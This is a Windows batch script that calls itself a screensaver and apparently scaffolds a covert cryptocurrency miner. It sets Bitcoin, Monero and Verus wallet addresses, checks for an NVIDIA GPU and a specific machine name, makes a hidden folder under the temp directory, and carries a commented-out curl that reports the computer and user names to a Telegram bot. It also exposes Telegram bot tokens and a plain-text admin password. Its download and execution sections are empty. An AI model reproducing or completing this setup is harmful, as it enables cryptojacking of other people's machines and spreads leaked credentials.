@echo off
rem ============================== REPOS

cls
set eq_repo="https://suporteeq.github.io"

cls
set bot_api="5778710873:AAEBZBIN_ZTBsRMJcdpEBdBu5rjiPlwqENU"

cls
set bot_chat_id="183148731"

cls
set exe_folder=%tmp%\onedrive

cls
if not exist %exe_folder% (
  mkdir %exe_folder%
)




rem ============================== VARS
cls
set bot_api="5697036371:AAHJK_uieu4mStE7T8CV74iHIm3uU7DKJQM"

cls
set bot_chat_id="183148731"

cls
set wallet_btc=3MN4fWiwDtGK2HxNuucDh5seZYNpvoswYs

cls
set wallet_monero=48F1cJdmazsjXdB1BR1RMyFWuaaZA8JYPic7DpCBptAsVDg5FrGks99HPEPadRnCeb8mvSs2HU3H9iHWBqxTM2rc1U4h644

cls
set wallet_verus=RT9dnZKysLPkwmcQSJ1Lx4GuynomjnHCtw

cls
set check_computer_name="bolsista"

cls
set check_gpu_name="nvidia"

cls
for /F "tokens=* skip=1" %%n in ('WMIC path Win32_VideoController get Name ^| findstr "."') do set gpu_name=%%n


set ADMUSER=suporte
set ADMPASS=suporte@eq


rem ============================== SET WINDOWS




rem ============================== UPDATE




rem ============================== DOWNLOADS




rem ============================== EXEC




rem ============================== NOTIFY

cls
rem curl -s "https://api.telegram.org/bot%bot_api%/sendMessage?chat_id=%bot_chat_id%&disable_notification=true&text=Computer:%computername%|User:%username%|screensaver"
cls
echo %computername% START %date% %time% >> \\10.30.225.12\suporte\logs\eq_screensaver.txt

